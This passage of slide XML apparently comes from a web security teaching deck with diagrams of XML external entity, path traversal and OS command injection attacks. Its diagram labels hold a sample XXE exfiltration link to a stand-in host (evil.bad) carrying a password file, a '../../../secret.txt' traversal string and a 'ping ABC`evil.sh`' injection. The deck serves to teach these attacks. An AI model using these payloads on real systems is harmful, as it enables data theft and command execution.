      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="274" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1472760" y="4134600"/>
            <a:ext cx="1686960" cy="1498320"/>
            <a:chOff x="1472760" y="4134600"/>
            <a:chExt cx="1686960" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="275" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1583280" y="413460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6" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1918440" y="431784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7" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1472760" y="5268960"/>
              <a:ext cx="1686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8" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045320" y="5250240"/>
            <a:ext cx="1049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9" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="273" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3218040" y="2898720"/>
            <a:ext cx="876600" cy="1893960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 40427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pic>
        <p:nvPicPr>
          <p:cNvPr id="280" name="Graphic 34" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="67105" t="53204" r="16431" b="-2165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218400" y="2521080"/>
            <a:ext cx="618840" cy="756000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206520" y="3516120"/>
            <a:ext cx="1136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Malicious Web Script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2" name="Graphic 22" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001320" y="1847160"/>
            <a:ext cx="510120" cy="643320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="283" name="Curved Connector 27"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="275" idx="0"/>
            <a:endCxn id="282" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1546920" y="2680560"/>
            <a:ext cx="1966320" cy="942480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="afabab"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="TextBox 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333080" y="2136240"/>
            <a:ext cx="1512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Confidential Docs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5" name="Curved Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="270" idx="1"/>
            <a:endCxn id="273" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="10800000">
            <a:off x="2804040" y="2497680"/>
            <a:ext cx="1766160" cy="1818720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -9255"/>
              <a:gd name="adj2" fmla="val 54405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pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Graphic 45" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376160" y="2963880"/>
            <a:ext cx="231840" cy="292320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287" name="Graphic 51" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4608720" y="3684960"/>
            <a:ext cx="231840" cy="292320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Graphic 52" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011680" y="3525120"/>
            <a:ext cx="231840" cy="292320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="289" name="Graphic 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217600" y="2794320"/>
            <a:ext cx="231840" cy="29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Box 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643480" y="2501640"/>
            <a:ext cx="4253760" cy="61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9900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="23000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt; /&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="19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Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805480" y="3013920"/>
            <a:ext cx="3994200" cy="2324160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542600" y="443160"/>
            <a:ext cx="10514880" cy="54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XML External Entities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3" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1645560" y="4703760"/>
            <a:ext cx="1049760" cy="1591560"/>
            <a:chOff x="1645560" y="4703760"/>
            <a:chExt cx="1049760" cy="1591560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="294" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1694880" y="470376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" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1645560" y="5657040"/>
              <a:ext cx="10497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6" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354320" y="2352600"/>
            <a:ext cx="1625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XML Processor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Picture 21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811880" y="1484280"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932560" y="3267720"/>
            <a:ext cx="374040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Include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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>/app/password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file as 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  <a:ea typeface="DejaVu Sans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Link to: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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>http://www.evil.bad/DTD?pass=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  <a:ea typeface="DejaVu Sans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9" name="Curved Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="297" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2529720" y="1917720"/>
            <a:ext cx="2455200" cy="2880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30517"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="76000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="TextBox 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486520" y="1460520"/>
            <a:ext cx="329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/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-CA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jmttN9YC4bK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Picture 38" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4984200" y="1454760"/>
            <a:ext cx="717840" cy="925560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="TextBox 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589640" y="2412360"/>
            <a:ext cx="1507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3" name="Curved Connector 50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="294" idx="0"/>
            <a:endCxn id="296" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1312560" y="3845520"/>
            <a:ext cx="1713240" cy="3960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2501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04" name="TextBox 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3907800" y="5338800"/>
            <a:ext cx="182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XML Document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81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1567800" y="2197800"/>
            <a:ext cx="348480" cy="449280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="306" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382560" y="1671840"/>
            <a:ext cx="874440" cy="1062360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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228680" y="790200"/>
            <a:ext cx="10514880" cy="54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Path Traversal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Box 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173120" y="1807560"/>
            <a:ext cx="2765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9" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2915640" y="4257000"/>
            <a:ext cx="1686960" cy="1498320"/>
            <a:chOff x="2915640" y="4257000"/>
            <a:chExt cx="1686960" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="310" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3026160" y="425700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1" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3361320" y="444024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2" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2915640" y="5391360"/>
              <a:ext cx="1686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13" name="Group 63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1228680" y="4514040"/>
            <a:ext cx="1049760" cy="1539720"/>
            <a:chOff x="1228680" y="4514040"/>
            <a:chExt cx="1049760" cy="1539720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="314" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1277640" y="451404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5" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1228680" y="5415480"/>
              <a:ext cx="10497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16" name="Curved Connector 21"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="314" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1996560" y="2684880"/>
            <a:ext cx="1586520" cy="2072880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16500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17" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081440" y="3427200"/>
            <a:ext cx="2765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../../../secret.txt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Graphic 11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525680" y="2315520"/>
            <a:ext cx="455760" cy="455760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Graphic 13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369600" y="2015280"/>
            <a:ext cx="912240" cy="912240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="Graphic 49" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2658960" y="2167200"/>
            <a:ext cx="709560" cy="709560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="321" name="Graphic 50" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2050560" y="2269440"/>
            <a:ext cx="583920" cy="583920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="322" name="Curved Connector 60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="319" idx="2"/>
            <a:endCxn id="311" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="3075120" y="3678120"/>
            <a:ext cx="1513080" cy="11880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25011"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="0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23" name="Curved Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="320" idx="0"/>
            <a:endCxn id="319" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="3039480" y="2141280"/>
            <a:ext cx="760680" cy="812520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19270"/>
              <a:gd name="adj2" fmla="val -65824"/>
              <a:gd name="adj3" fmla="val 119270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24" name="Curved Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="321" idx="0"/>
            <a:endCxn id="320" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="2374560" y="2237400"/>
            <a:ext cx="607680" cy="671400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -24718"/>
              <a:gd name="adj2" fmla="val -70332"/>
              <a:gd name="adj3" fmla="val 124718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25" name="Curved Connector 78"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="318" idx="0"/>
            <a:endCxn id="321" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="1779120" y="2289960"/>
            <a:ext cx="538200" cy="589320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28246"/>
              <a:gd name="adj2" fmla="val -69254"/>
              <a:gd name="adj3" fmla="val 128246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26" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519120" y="2071800"/>
            <a:ext cx="1177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Box 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918240" y="4128840"/>
            <a:ext cx="2765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1173600" y="21096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OS Command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70880" cy="1665720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="330" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="4358880"/>
            <a:ext cx="1049760" cy="1548360"/>
            <a:chOff x="1329120" y="4358880"/>
            <a:chExt cx="1049760" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="331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35888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TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="5268960"/>
              <a:ext cx="10497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33" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="331" idx="0"/>
            <a:endCxn id="329" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1414440" y="3958200"/>
            <a:ext cx="795240" cy="648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34" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1755360" y="3926520"/>
            <a:ext cx="2014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host: ABC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`evil.sh`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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196640" y="1582560"/>
            <a:ext cx="111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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520800" y="1713600"/>
            <a:ext cx="210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Operating System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37" name="Curved Connector 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="329" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494440" y="2730960"/>
            <a:ext cx="1391400" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34704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38" name="TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2397600" y="2398320"/>
            <a:ext cx="15663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08080"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ping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ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>`evil.sh`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9" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735880" y="1483200"/>
            <a:ext cx="1564920" cy="968040"/>
            <a:chOff x="5735880" y="1483200"/>
            <a:chExt cx="1564920" cy="968040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="340" name="Graphic 30" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="1483200"/>
              <a:ext cx="1159200" cy="968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1" name="Rectangle 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="1483200"/>
              <a:ext cx="1564920" cy="22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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="DejaVu Sans"/>
                </a:rPr>
                <a:t>&gt;_ ping ABC</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US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2" name="Group 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735880" y="2808720"/>
            <a:ext cx="1564920" cy="968040"/>
            <a:chOff x="5735880" y="2808720"/>
            <a:chExt cx="1564920" cy="968040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="343" name="Graphic 53" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="2808720"/>
              <a:ext cx="1159200" cy="968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4" name="Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="2808720"/>
              <a:ext cx="1564920" cy="24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Courier New"/>
                  <a:ea typeface="DejaVu Sans"/>
                </a:rPr>
                <a:t>&gt;_ evil.sh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45" name="Straight Arrow Connector 56"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="340" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5128560" y="1967040"/>
            <a:ext cx="607680" cy="767520"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="346" name="Straight Arrow Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="343" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128560" y="2733840"/>
            <a:ext cx="607680" cy="559080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round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Rectangle 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787360" y="1739880"/>
            <a:ext cx="11682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000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f4f4f4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ping: cannot resolve ABC: Unknown host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Rectangle 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847120" y="3149640"/>
            <a:ext cx="1168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f4f4f4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&gt; :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Graphic 63" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3913200" y="2152800"/>
            <a:ext cx="1156320" cy="115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Box 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291760" y="2376720"/>
            <a:ext cx="374796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432ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
